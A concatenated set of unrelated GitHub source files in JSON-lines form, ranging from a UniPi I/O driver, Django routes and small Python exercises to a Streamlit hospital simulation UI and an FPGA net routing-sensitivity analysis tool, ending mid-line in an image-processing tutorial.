'circuit': self.circuit, 'value': self.value}\n\n @gen.coroutine\n def set_value(self, value):\n valuei = int(float(value) / self.factor)\n self.arm.write_regs(self.reg.regnum,valuei)\n raise gen.Return(value)\n\n def set(self, value=None, frequency=None):\n valuei = int(float(value) / self.factor)\n self.arm.write_regs(self.reg.regnum,valuei)\n return value\n\n\nclass AnalogInput():\n\n def __init__(self, circuit, arm, reg, correction = None):\n self.circuit = circuit\n self.reg = arm.get_proxy_register(reg)\n self.reg.devices.add(self)\n self.arm = arm\n self.correction = 1 if correction is None else correction\n\n @property\n def value(self):\n try:\n return self.reg.value * 10.65 / 4095 * self.correction\n except:\n return 0\n\n def full(self):\n return {'dev': 'ai', 'circuit': self.circuit, 'value': self.value}\n\n def simple(self):\n return {'dev': 'ai', 'circuit': self.circuit, 'value': self.value}\n\n\n @property # docasne!!\n def voltage(self):\n return self.value\n\n\n\n","repo_name":"chrischnweiss/evok","sub_path":"evok/unipi2.py","file_name":"unipi2.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"27413931204","text":"from django.urls import path\n\nfrom accounts.api import UserDetailsView, Register, Activate, GetOrders, CancelOrder\n\nurlpatterns = (\n path(\"api/v1/user/\", UserDetailsView.as_view()),\n path(\"api/v1/get_orders/\", GetOrders.as_view(), name='get_orders'),\n path(\"api/v1/cancel_order/<int:order>/\", CancelOrder.as_view(), name='cancel_order'),\n\n path(\"api/v1/register/\", Register.as_view(), name='register'),\n path(\"api/v1/activate/<str:uidb64>/<str:token>/\", Activate.as_view(), name='activate'),\n)\n","repo_name":"kozlyuk/envista","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16147966412","text":"import random\n\nwith open(\"/home/davo/testfile\", \"r+\", encoding=\"utf - 8\") as f:\n guess_word = random.choice([line for line in f]).strip()\n\n\ndef find_index(word, value):\n start = -1\n indexes = []\n while True:\n try:\n ind = word.index(value, start + 1)\n indexes.append(ind)\n start = ind\n except ValueError:\n break\n return indexes\n\n\ndef hangman(word):\n guess_limit = 5\n output = \"-\" * (len(word))\n\n while guess_limit != 0:\n print(output)\n user_input = input(f\"Guess the word. {guess_limit} mistakes left: \").lower()\n print(f\"Guess a letter: {user_input.upper()}\")\n if user_input in word:\n temp_position_list = find_index(word, user_input)\n for pos in temp_position_list:\n temp = list(output)\n temp[pos] = user_input\n output = \"\".join(temp)\n else:\n guess_limit -= 1\n if guess_limit == 0:\n print(\"You lost the game\")\n elif word == output:\n print(\"You won the game\")\n break\n\n\nhangman(guess_word)\n","repo_name":"Davitkhachikyan/HTI-1-Practical-Group-2-Davit-Khachikyan","sub_path":"homework_6/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17955850810","text":"# from numpy.lib.arraysetops import ediff1d\nimport sys\nsys.path.insert(0, '../EDSIM-BackEnd/')\n\nimport streamlit as st\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom bokeh.palettes import Spectral4\nfrom bokeh.plotting import figure, output_file, show\nimport ED_Model2 as Model\nimport Statistics as s\n\n#Title at the top \nst.title('Emergency Department Simulation')\n\n# File Upload/Processing\nfile = st.file_uploader('Upload .csv file with data')\ndef process_file(file):\n st.write(file)\n df = pd.read_csv(file)\n st.write(df)\nif st.button('Process file'):\n process_file(file)\n\n#Inputting Fields/ Sliders for each category \ncol1, col2, col3 = st.columns(3)\ncol2.subheader('Resource Allocation')\ncol3.subheader('Patient Inter-Arrival Times (mins)')\ncol1.subheader('Process Service Times (mins)')\nwith col2:\n docs = st.number_input('Number of Doctors', 1, 5, 2)\n nurse = st.number_input('Number of Nurses', 1, 5, 2)\n beds = st.number_input('Number of Beds', 1, 5, 2)\n resbeds = st.number_input('Number of Resuscitation Beds', 1, 5, 2)\nwith col3:\n walkInP = st.number_input('Walk-In Patients', 1, 1000, 478)\n AmbulanceP = st.number_input('Ambulance Patients', 1, 50, 9)\nwith col1:\n CTASass = st.number_input('CTAS Assessment', 1, 50, 42)\n Priorityass = st.number_input('Priority Assessment', 1, 50, 23)\n Initialass = st.number_input('Initial Assessment', 1, 50, 42)\n Dischargeass = st.number_input('Discharge Assessment', 1, 50, 23)\n Treatment = st.number_input('Treatments', 1, 50, 20)\n Bedass = st.number_input('Bed Assignment', 1, 50, 32)\n Resus = st.number_input('Resuscitations', 1, 50, 19)\n Registration = st.number_input('Registrations', 1, 50, 49)\nst.header('Simulation Parameters')\nsimPar_duration = st.number_input('Duration (mins)', 1, 30, 10)\nsimPar_iterations = st.number_input('Iterations', 5, 40, 18)\nsimPar_warmUp = st.number_input('Warm Up Period', 1, 30, 10)\n\nsimParameters = {\n 'resCapacity': {\n 'doctor':docs, \n 'nurse':nurse,\n 'beds':beds,\n 'rBeds':resbeds, \n\n }, \n 'pInterArrival':{\n 'ambulance':walkInP, \n 'walkIn': AmbulanceP\n\n }, \n 'serTimes':{\n 'priorAssessment': Priorityass, \n 'ctasAssessment':CTASass, \n 'registration':Registration, \n 'bedAssignment':Bedass,\n 'initialAssessment':Initialass,\n 'treatment':Treatment, \n 'discharge':Dischargeass,\n 'resuscitation':Resus \n }, \n 'ctasDist':{\n 'ambulance': {\n 1:0.5, \n 2:0.2, \n 3:0.3, \n 4:0.1, \n 5:0\n \n }, \n 'walkIn':{\n 1:0.3, \n 2:0.2, \n 3:0.1, \n 4:0.1, \n 5:0.1\n }\n\n }, \n 'iter':simPar_iterations,\n 'warmUp':simPar_warmUp, \n 'length':simPar_duration\n}\n\ndef los_chart(meanLOS):\n meanLOSforCTAS1 = s.getDataByCTASLevel(meanLOS, 1)\n meanLOSforCTAS2 = s.getDataByCTASLevel(meanLOS, 2)\n meanLOSforCTAS3 = s.getDataByCTASLevel(meanLOS, 3)\n meanLOSforCTAS4 = s.getDataByCTASLevel(meanLOS, 4)\n meanLOSforCTAS5 = s.getDataByCTASLevel(meanLOS, 5)\n\n p = figure(width=800, height=250)\n p.title.text = 'Click on legend entries to hide the corresponding lines'\n\n p.line(y = meanLOSforCTAS1, line_width=2, color='firebrick', alpha=0.8, legend_label='Los for CTAS 1')\n\n p.legend.location = \"top_left\"\n p.legend.click_policy=\"hide\"\n\n fig, axs = plt.subplots(5,figsize=(10,17))\n \n # Subplot for each CTAS level\n axs[0].plot(meanLOSforCTAS1, 'C0')\n axs[0].set_xlabel('Run ID')\n axs[0].set_ylabel('Mean length of stay (min)')\n axs[0].set_title('Mean Patient Length of Stay per Run ID (CTAS 1-5)')\n\n axs[1].plot(meanLOSforCTAS2, 'C1')\n axs[1].set_xlabel('Run ID')\n axs[1].set_ylabel('Mean length of stay (min)')\n\n axs[2].plot(meanLOSforCTAS3, 'C2')\n axs[2].set_xlabel('Run ID')\n axs[2].set_ylabel('Mean length of stay (min)')\n\n axs[3].plot(meanLOSforCTAS4, 'C3')\n axs[3].set_xlabel('Run ID')\n axs[3].set_ylabel('Mean length of stay (min)')\n\n axs[4].plot(meanLOSforCTAS5, 'C4')\n axs[4].set_xlabel('Run ID')\n axs[4].set_ylabel('Mean length of stay (min)')\n\n return p\n\n\n\n#The graphs being displayed/modeled\n\nif st.button('Run Simulation'):\n # Gets results\n results_df = Model.runSim(simParameters)\n #Group dataframe by Run ID and CTAS Level\n means = s.meanByGroup(results_df)\n\n #Mean LOS of grouped dataframe\n meanLOS = s.meanParByCTASperRun(means,'los')\n #create charts \n los_chart = los_chart(meanLOS)\n # Shows the charts\n st.bokeh_chart(los_chart, use_container_width=True)\n # Display the results (text)\n summary = s.calculateSummary(results_df)\n #for t in text:\n st.write(0)\n\n# Download .txt file \n\n#IMPLEMENT HEREEEEEEEEEEEEEEEe\n\n\n\n","repo_name":"SarmadTanveer/EDSIM","sub_path":"EDSIM-FrontEnd/streamlit_ed_model.py","file_name":"streamlit_ed_model.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42999567886","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n * ========================================================================\n *\n * Filename: Day 4\n *\n * Description: Overlapping\n *\n * Version: 1.0\n * Created: 01/04/20 18:28:09\n * Revision: none\n *\n * Author: Antonio Molina Jiménez (AMJ), amj.com@gmail.com\n * Company:\n *\n * ========================================================================\n\"\"\"\n\n\ndef main():\n with open('input4.txt', 'r') as f:\n lines = f.readlines()\n overlaps = 0\n partial = 0\n\n for i in lines:\n pair = i.split(',')\n r1 = pair[0]\n r2 = pair[1]\n\n r1_ini = int(r1.split('-')[0])\n r1_end = int(r1.split('-')[1])\n\n r2_ini = int(r2.split('-')[0])\n r2_end = int(r2.split('-')[1])\n\n if (r1_ini <= r2_ini) and (r1_end >= r2_end):\n # Overlap r1_ini....r2_ini...r2_end...r1_end\n overlaps = overlaps + 1\n elif (r1_ini >= r2_ini) and (r1_end <= r2_end):\n # Overlap r2_ini....r1_ini...r1_end...r2_end\n overlaps = overlaps + 1\n elif (r1_ini <= r2_ini) and (r1_end >= r2_ini):\n # Overlap r1_ini....r2_ini...r1_end...r2_end\n partial = partial + 1\n elif (r2_ini <= r1_ini) and (r2_end >= r1_ini):\n # Overlap r2_ini....r1_ini...r2_end...r1_end\n partial = partial + 1\n\n total = overlaps + partial\n\n print(f\"Part 1: There are {overlaps} full overlaps\")\n print(f\"Part 2: There are {total} total overlaps\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amjdev/AdventOfCode2022","sub_path":"Day 4/Day4.py","file_name":"Day4.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2449410413","text":"matriz = [[],[],[]]\r\n\r\nparT = 0\r\ncol3 = 0\r\nmai2 = 0\r\n\r\nfor i in range (0,3):\r\n for c in range (0,3):\r\n x = int(input(f'Digite um valor para posição {i,c}: '))\r\n matriz[i].append(x)\r\n if x % 2 == 0:\r\n parT += x\r\n\r\nfor d in range (0,3):\r\n col3 += matriz[d][2]\r\n\r\nmai2 = matriz[1][0]\r\n\r\nfor e in range (1,3):\r\n if matriz[1][e] > mai2:\r\n mai2 = matriz[1][e]\r\n\r\nprint('-'*40)\r\n\r\nfor a in range (0,3):\r\n for b in range (0,3):\r\n print(f'[ {matriz[a][b]} ]',end=\"\")\r\n if b == 2:\r\n print('\\n',end=\"\")\r\n\r\nprint(f'A soma dos valores pares é {parT}')\r\nprint(f'A soma dos valores da terceira coluna é {col3}')\r\nprint(f'O maior valor da segunda linha é {mai2}')\r\n","repo_name":"jvjzn/PythonExercicios","sub_path":"ex095-matriz.py","file_name":"ex095-matriz.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18149296817","text":"def average(array):\n set_lst = list(set(array))\n num = len(set_lst)\n sum_lst = sum(set_lst)\n\n avg = sum_lst/num\n return avg\n\nif __name__ == '__main__':\n n = int(input())\n arr = list(map(int, input().split()))\n result = average(arr)\n print(result)","repo_name":"Benson1198/31-Days-of-CP","sub_path":"Day 16/sets(Hackerrank).py","file_name":"sets(Hackerrank).py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7915294044","text":"import imp\nfrom unicodedata import name\nimport torch\nfrom .lambdaloss import LambdaLoss\nfrom .focalloss import FocalLoss\nfrom .ensemble_loss import Ensemble_BCELoss,Ensemble_MSELoss\n\ndef build_loss_fn(loss_name, loss_cfg):\n if loss_name == 'LambdaLoss':\n return LambdaLoss()\n elif loss_name == 'FocalLoss':\n return FocalLoss(**loss_cfg.kwargs)\n elif loss_name == 'Ensemble_BCELoss':\n return Ensemble_BCELoss(**loss_cfg.kwargs)\n elif loss_name == 'Ensemble_MSELoss':\n return Ensemble_MSELoss(**loss_cfg.kwargs)\n else:\n loss_fn = getattr(torch.nn,loss_name)\n return loss_fn(**loss_cfg.kwargs)\n\nclass CombinedLossEvaluator(object):\n \"\"\"\n Combined multiple loss evaluator\n \"\"\"\n def __init__(self, loss_evaluators, loss_weights):\n\n self.loss_evaluators = loss_evaluators\n self.loss_weights = loss_weights\n \n def __call__(self, pred_results, gt, **kwargs):\n comb_loss_dict = {}\n for loss_name, loss_evaluator in self.loss_evaluators.items():\n loss = loss_evaluator(pred_results,gt)\n weight = self.loss_weights[loss_name]\n if isinstance(loss,dict):\n loss = {k:v*weight for k,v in loss.items()}\n else:\n comb_loss_dict[loss_name] = loss*weight\n return comb_loss_dict\n\ndef build_loss_evaluator(cfg):\n loss_evaluators = dict()\n loss_weights = dict()\n loss_dict = cfg.model.losses.copy()\n for loss_name,loss_cfg in loss_dict.items():\n loss_evaluator = build_loss_fn(loss_name,loss_cfg)\n loss_evaluators[loss_name] = loss_evaluator\n loss_weights[loss_name] = loss_cfg.weight\n return CombinedLossEvaluator(loss_evaluators,loss_weights)\n","repo_name":"William-Zhanng/SenseXAMP","sub_path":"Ampmm_base/models/losses/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"71876947688","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n seen = {}\n for key, num in enumerate(nums):\n remaining = target - num\n\n if remaining in seen:\n return [key, seen[remaining]]\n\n seen[num] = key\n\n\nsolution = Solution()\nprint(solution.twoSum([3, 3], target = 6))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14833000218","text":"import sys\n\n# Add the parent directory of this file (bfat root) to the interpreter's path\nsys.path.append(f'{\"/\".join(__file__.split(\"/\")[:-1])}/..')\n\nfrom bfat import get_tile_type_name\nfrom lib.tile import Tile\nfrom lib.file_processing import parse_tilegrid\nfrom lib.design_query import DesignQuery\nfrom lib.define_bit import bit_bitstream_addr\nfrom tqdm import tqdm\nfrom statistics import mean, stdev, median, quantiles\nimport pickle\n\n############################################\n# Data Storage Classes #\n############################################\n\nclass AnalyzedNet:\n '''\n Stores relevant information about the net and its sensitive bits\n Arguments: string of the net's name, design query object\n\n Attributes:\n name - the net's name\n\n pips - information about all used interconnect pips by the net\n - each pip is stored as a PipInfo object\n\n num_bits - total number of configuration bits affecting the net's routing\n '''\n\n __slots__ = ('name', 'pips', 'num_bits')\n\n def __init__(self, net_name:str, design:DesignQuery, tilegrid:dict):\n '''\n Constructor, finds all pips and sensitive bits related to the net and\n populates class members with the retrieved information\n Arguments: net_name, design query object, tilegrid information\n '''\n\n # Set some default values\n self.name = net_name\n self.pips = []\n self.num_bits = 0\n\n # Query design for pips of the net and verify the net exists and uses pips\n net_pips = design.get_pips(self.name)\n if self.name not in design.pips or design.pips[self.name] == []:\n return\n\n # Gather bit configuration information about each pip's routing mux\n for pip in net_pips:\n # Ignore non-INT pips\n if any(['INT_L' not in wire and 'INT_R' not in wire for wire in pip]):\n continue\n \n # Create PipInfo objects for storing configuration bit information\n pip_info = PipInfo(pip, design, tilegrid)\n\n # Verify that the object was created correctly\n if hasattr(pip_info, 'pip_name'):\n self.pips.append(pip_info)\n self.num_bits += len(pip_info.row_bits) + len(pip_info.col_bits)\n\nclass PipInfo:\n '''\n Stores relevant information about a pip\n Arguments: part tilegrid information\n \n Attributes:\n pip_name - name of the pip, formatted to match Vivado\n\n mux_name - name of the routing mux\n\n mux_type - type of the routing mux (2-12, 2-18, 2-20, 5-16, 5-24)\n\n row_bits - list of the row bits for the routing mux\n\n col_bits - list of the column bits for the routing mux\n '''\n\n __slots__ = ('pip_name', 'mux_name', 'mux_type', 'row_bits', 'col_bits')\n\n def __init__(self, pip:tuple, design:DesignQuery, tilegrid:dict):\n '''\n Constructor, gathers all configuration bit information about the pip and its\n routing mux and stores it in member variables\n '''\n\n # Retrieve the tile name and the sink/source nodes of the pip, construct tile object\n tile, sink = pip[1].split('/')\n src = pip[0].split('/')[1]\n tile_type = get_tile_type_name(tile)\n tile_obj = Tile(tile, tile_type, design.part)\n\n # Verify that the pip sink is a switchbox routing mux in the tile\n if sink not in tile_obj.pips or src not in tile_obj.pips[sink]:\n return\n \n # Format relevant information and add to the member variables\n self.pip_name = f'{tile}/{tile_type}.{src}->>{sink}'\n self.mux_name = sink\n self.mux_type = tile_obj.resources[sink].mux_type\n\n # Get all configuration bits for the mux\n mux_config_bits = {'Row Bits' : tile_obj.resources[sink].row_bits,\n 'Column Bits' : tile_obj.resources[sink].col_bits}\n\n mux_conv_bits = {'Row Bits' : [], 'Column Bits' : []}\n # Convert each configuration bit to the full bittstream address format\n for bit_type, addresses in mux_config_bits.items():\n for addr in addresses:\n tile_addr = [tile, addr, 0]\n bitstream_addr = bit_bitstream_addr(tile_addr, tilegrid)\n mux_conv_bits[bit_type].append(bitstream_addr)\n\n # Populate object members with bit information\n self.row_bits = mux_conv_bits['Row Bits']\n self.col_bits = mux_conv_bits['Column Bits']\n\n############################################\n# Functions for dealing with .pickle files #\n############################################\n\ndef unserialize_structure(pickled_file:str):\n '''\n Unserializes a file containing the data from a previous run of this tool\n Arguments: string of the path to the pickled file\n Returns: list of analyzed nets\n '''\n\n # Open the file and unserialize the data\n with open(pickled_file, 'rb') as p_f:\n analyzed_nets = pickle.load(p_f)\n\n does_not_match = False\n # Check that the resulting data structure matches the expected format\n if not isinstance(analyzed_nets, list):\n does_not_match = True\n elif len(analyzed_nets) > 0 and not isinstance(analyzed_nets[0], AnalyzedNet):\n does_not_match = True\n\n # Throw exception if the data structure does not match\n if does_not_match:\n raise Exception('Input serialized data structure does not match expected format')\n\n return analyzed_nets\n\ndef serialize_structure(analyzed_nets:list, report_name:str):\n '''\n Serializes the final data structure and exports it to a file with\n a generated name\n Arguments: list of analyzed nets, string of report's filename\n Returns: Output .pickle file of the analysis\n '''\n\n # Change file extension to .pickle\n if len(report_name.split('.')) > 1:\n report_name = '.'.join(report_name.split('.')[:-1])\n outfile_name = report_name + '.pickle'\n\n # Open the file to write the data to\n with open(outfile_name, 'wb') as o_f:\n pickle.dump(analyzed_nets, o_f)\n\n############################################\n# Feature Flag Functions #\n############################################\n\ndef graph_output(nets:list):\n '''\n Plots a histogram showing the frequency at which different nets exhibit\n higher/lower numbers of used routing bits:\n Arguments: list of analyzed nets, string of the report's filename\n Returns: GUI of the plot\n '''\n\n import matplotlib.pyplot as plt\n\n N_BINS = 50\n\n # Extract the number of related bits from each net's object\n bit_freqs = [net.num_bits for net in nets]\n\n # Create the plot\n plt.hist(bit_freqs, density=False, bins=N_BINS)\n plt.title('Net Routing Sensitivity Analysis')\n plt.xlabel('Related bits per net')\n plt.ylabel('Frequency')\n plt.yscale('log')\n plt.show()\n\ndef remove_tmr_nets(nets:list, tmr_suffix:str):\n '''\n Filters out from a list of nets all triplicated nets\n Arguments: list of either AnalyzedNet objects or strings of net names\n Returns: list of non-triplicated AnalyzedNet objects or net names\n '''\n\n non_tmr_nets = []\n\n # Set of already checked net names (for efficiency)\n checked_nets = set()\n\n # Verify that the list of nets is either of AnalyzedNets or strings\n if all([isinstance(net_obj, AnalyzedNet) for net_obj in nets]):\n net_names = [net.name for net in nets]\n elif all([isinstance(net_obj, str) for net_obj in nets]):\n net_names = nets\n\n # Iterate through all nets in the list\n for net_obj in tqdm(nets):\n # If the given data structure is an AnalyzedNet object, use the name member\n if isinstance(net_obj, AnalyzedNet):\n net_name = net_obj.name\n elif isinstance(net_obj, str):\n net_name = net_obj\n\n # Skip net if it has already been checked\n if net_name in checked_nets:\n continue\n checked_nets.add(net_name)\n\n # Check if the TMR suffix is in the net name \n if tmr_suffix not in net_name:\n non_tmr_nets.append(net_obj)\n continue\n\n # Find the index of the TMR copy number in the string\n tmr_num_index = net_name.find(tmr_suffix) + 1 + len(tmr_suffix) # +1 is to account for '_'\n tmr_num = net_name[tmr_num_index]\n\n # Create list of TMR numbers to check\n tmr_nums_to_check = ['0', '1', '2']\n tmr_nums_to_check.remove(tmr_num)\n\n num_copies = 0\n # Check that two other copies of this net exist in the list of nets\n for curr_tmr_num in tmr_nums_to_check:\n # Create a copy of the net name with the changed TMR number\n net_copy = list(net_name)\n net_copy[int(tmr_num_index)] = curr_tmr_num\n net_copy = ''.join(net_copy)\n\n # Set flag if the copy exists\n if net_copy in net_names:\n num_copies += 1\n checked_nets.add(net_name)\n\n # This is a non-TMR net if less than 2 copies exist\n if num_copies < 2:\n non_tmr_nets.append(net_obj)\n \n return non_tmr_nets\n\n############################################\n# File I/O Helpers #\n############################################\n\ndef parse_nets_file(nets_file:str):\n '''\n Parses a text file containing all of the nets to analyze\n Arguments: String of the path to the nets file\n Returns: List containing all of the nets\n '''\n\n nets = []\n\n # Open the file and add the net on each line to the list\n with open(nets_file) as nets_f:\n for line in nets_f:\n net = line.strip()\n\n # Make sure the net is in the correct format\n if ' ' in net or '\\t' in net:\n raise Exception('File cannot include more than one net per line')\n\n nets.append(net)\n\n return nets\n\ndef get_outfile_name(outname_arg:str, nets_path:str, tmr_nets_ignored:bool):\n '''\n Generates a name for the output fault report file based on the arguments passed\n in by the user and net list file used\n Arguments: Strings of the file paths to the output file and the net list file,\n flag telling whether TMR nets were ignored or net\n Returns: String of the appropriate output file name\n '''\n\n outfile_name = ''\n\n # Return the user provided name if one was provided\n if outname_arg:\n outfile_name = outname_arg\n\n # If --all_nets flag was used (no nets file), generate entirely new file name\n elif not nets_path:\n # If TMR nets were ignored, note that in the output file name\n if tmr_nets_ignored:\n outfile_name = 'all_nonTMR_nets_analysis.txt'\n else:\n outfile_name = 'all_nets_analysis.txt'\n\n # Otherwise, generate name based on input nets file name\n else:\n # Obtain extensionless filename of the nets file\n nets_path = nets_path.strip().split('/')\n nets_file_name, _ = nets_path[-1].split('.')\n\n # If TMR nets were ignored, note that in the output file name\n if tmr_nets_ignored:\n outfile_name = f'{nets_file_name}_nonTMR_analysis.txt'\n else:\n outfile_name = f'{nets_file_name}_analysis.txt'\n\n return outfile_name\n\ndef print_analysis(analyzed_nets:list, outfile:str):\n '''\n Formats and prints the information about the nets' sensitive bits\n Arguments: analyzed nets list, string of output file path\n Returns: Output file (.txt) of the analysis\n '''\n \n # Open the output file to write to it\n with open(outfile, 'w') as o_f:\n # Write each net's information to the output file\n for net in analyzed_nets:\n o_f.write(f'{net.name}\\n')\n o_f.write(f'Pips: ({len(net.pips)})\\n')\n\n # Write each pip's sensitivity information to the file for the net\n for pip in net.pips:\n o_f.write(f'\\t{pip.pip_name} - {pip.mux_name} {pip.mux_type} Routing Mux:\\n')\n o_f.write(f'\\t\\tRow Bits: {pip.row_bits}\\n')\n o_f.write(f'\\t\\tColumn Bits: {pip.col_bits}\\n\\n')\n \n o_f.write(f'Total config bits: {net.num_bits}\\n')\n o_f.write('\\n-----------------------------------\\n\\n')\n\n # Extract the number of related bits from each net's object\n bit_freqs = [net.num_bits for net in analyzed_nets]\n\n # Gather some summary statistics about the data\n num_nets = len(bit_freqs)\n num_bits = sum(bit_freqs)\n bits_mean = mean(bit_freqs)\n bits_median = median(bit_freqs)\n \n # Standard deviation is only valid for data sets longer than one\n if num_nets > 1:\n bits_sd = stdev(bit_freqs)\n else:\n bits_sd = 'NA'\n\n # Deciles only valid for data sets larger than 10\n if num_nets > 10:\n bits_deciles = quantiles(bit_freqs, n=10)\n else:\n bits_deciles = 'NA'\n\n # Print the previously calculated summary statistics\n o_f.write('Summary Statistics:\\n')\n o_f.write(f'\\tNumber of Nets Analyzed: {num_nets}\\n')\n o_f.write(f'\\tNumber of Sensitive Bits: {num_bits}\\n')\n o_f.write(f'\\tMean of Bits Per Net: {bits_mean}\\n')\n o_f.write(f'\\tStdDev of Bits Per Net: {bits_sd}\\n')\n o_f.write(f'\\tMedian of Bits Per Net: {bits_median}\\n')\n o_f.write(f'\\tDeciles of Bits Per Net: {bits_deciles}')\n\n############################################\n# Main Function #\n############################################\n\ndef main(args):\n '''\n Main function: Writes a sensitivity report for all the nets given\n for a specific design with all related pips and routing bits\n '''\n\n # Unserialize data structure if flag is set\n if args.pickled_input:\n print('Unserializing data structure...')\n analyzed_nets = unserialize_structure(args.nets)\n\n # Remove all triplicated nets from the data structure if flag is set\n if args.non_tmr:\n print('Removing triplicated nets...')\n analyzed_nets[:] = remove_tmr_nets(analyzed_nets, args.non_tmr)\n\n # Standard net analysis flow\n else:\n print('Building design query...')\n\n # Create design query object\n if args.rapidwright:\n from lib.rpd_query import RpdQuery\n design = RpdQuery(args.dcp_file)\n else:\n from lib.design_query import VivadoQuery\n design = VivadoQuery(args.dcp_file)\n\n # Get part tilegrid information\n print('Parsing part tilegrid information from database...')\n tilegrid = parse_tilegrid(design.part)\n\n # Retrieve the nets to analyze\n print('Retrieving nets...')\n if args.all_nets:\n nets = design.get_all_nets()\n else:\n nets = parse_nets_file(args.nets)\n\n # Remove all triplicated nets from the list if flag is set\n if args.non_tmr:\n print('Removing triplicated nets...')\n nets[:] = remove_tmr_nets(nets, args.non_tmr)\n\n print('Analyzing nets...')\n analyzed_nets = []\n\n # Analyze all nets (retrieve all relevant pips, routing muxes, and configuration bits)\n for net in tqdm(nets):\n analyzed_net = AnalyzedNet(net, design, tilegrid)\n analyzed_nets.append(analyzed_net)\n\n # Get the output file name\n print('Generating output file...')\n outfile = get_outfile_name(args.out_file, args.nets, bool(args.non_tmr))\n\n # Print report of the found information\n print_analysis(analyzed_nets, outfile)\n\n # If the -p flag is set, serialize the analyzed_nets structure and write to a file\n if args.pickle:\n print('Serializing analysis data structure...')\n serialize_structure(analyzed_nets, outfile)\n\n # If the -g flag is set, graph a histogram of the data\n if args.graph:\n print('Generating histogram of the data...')\n graph_output(analyzed_nets)\n\n print('Done!')\n\nif __name__ == '__main__':\n import argparse\n # Create Argument Parser to take in command line arguments\n parser = argparse.ArgumentParser(description=\"Analyzes the given nets in a design and \"\n + \"reports all of the nets' sensitive bits\")\n # Input Files\n parser.add_argument('dcp_file', help='Vivado checkpoint file of the implemented design')\n parser.add_argument('nets', nargs='?',\n help='Text file containing the names of the net(s) to analyze')\n # Feature Flags\n parser.add_argument('-a', '--all_nets', action='store_true',\n help='Analyze the sensitivity of all nets in the design (this will take a while)')\n parser.add_argument('-rpd', '--rapidwright', action='store_true',\n help='Flag to use Rapidwright to read design data (unneeded if using --pickled_input')\n parser.add_argument('-g', '--graph', action='store_true',\n help='Plots a histogram of the frequency that the nets exhibit numbers of routing bits.')\n parser.add_argument('-p', '--pickle', action='store_true',\n help='Write the analysis data structure in a serialized format to a file')\n parser.add_argument('-pi', '--pickled_input', action='store_true',\n help='Input a pickled data structure containing the contents of a previous run of this tool '\n 'instead of a nets file')\n parser.add_argument('-ntmr', '--non_tmr', default='', help='Ignore all triplicated nets with the given TMR suffix')\n # Optional Output File Path\n parser.add_argument('-of', '--out_file', default='', help='File path where the output is to be written.')\n args = parser.parse_args()\n\n # Make sure a nets file is given if the \"all\" flag is not set\n if not args.nets and not args.all_nets:\n raise Exception('The nets argument is required unless the --all_nets flag is set')\n\n main(args)","repo_name":"byuccl/bfat","sub_path":"utils/net_analysis.py","file_name":"net_analysis.py","file_ext":"py","file_size_in_byte":18326,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"724751836","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python3\n\nimport tkinter as tk\nfrom scrape_01 import Scrape\n\n\nclass scraype_gui(Scrape):\n\n def __init__(self):\n super(scraype_gui, self).__init__(url=[''])\n\n def main(self):\n root = tk.Tk()\n text = tk.Text(root, height=10, width=40)\n text.pack(side=tk.LEFT, fill=tk.Y)\n scroll = tk.Scrollbar(root)\n scroll.pack(side=tk.RIGHT, fill=tk.Y)\n scroll.config(command=text.yview)\n text.config(yscrollcommand=scroll.set)\n for i in super().get_link():\n text.insert(tk.END, i)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n gui = scraype_gui()\n gui.main()","repo_name":"Masarusan/untitled2","sub_path":"scraying/scrayper/scraype_gui/scrayper_gui.py","file_name":"scrayper_gui.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5306039774","text":"\n\n# For this tutorial series you only need python scipy and matplotlib to display image\nfrom scipy import misc\nimport numpy as np\n\n# 0. Read the image\nimage = misc.imread('lena.png')\n\n# 1. Get the image width, height, and dim of color image\nwidth_col,height_col,dim_col = image.shape\n\n# 2. Convert the image into gray scale\nimage_gray = misc.imread('lena.png')\n\n# 3. Operation of dot prodcut to get each channel's porportion\nimage_gray = np.dot(image_gray[...,:3],[0.299, 0.587, 0.114])\nwidth_gray,height_gray = image_gray.shape\n# Source: http://stackoverflow.com/questions/12201577/how-can-i-convert-an-rgb-image-into-grayscale-in-python\n\n# 4. Read the gray image directly \n# for more information - https://docs.scipy.org/doc/scipy-0.18.1/reference/generated/scipy.misc.imread.html\nimage_gray_dir = misc.imread('lena.png',mode=\"L\")\n\nimport matplotlib.pyplot as plt\n\n# 4. Display both images\n# plt.imshow(image_gray,cmap = plt.get_cmap('gray'))\n# plt.show() \n\n# Four axes, returned as a 2-d array\nf, axarr = plt.subplots(2, 2)\naxarr[0, 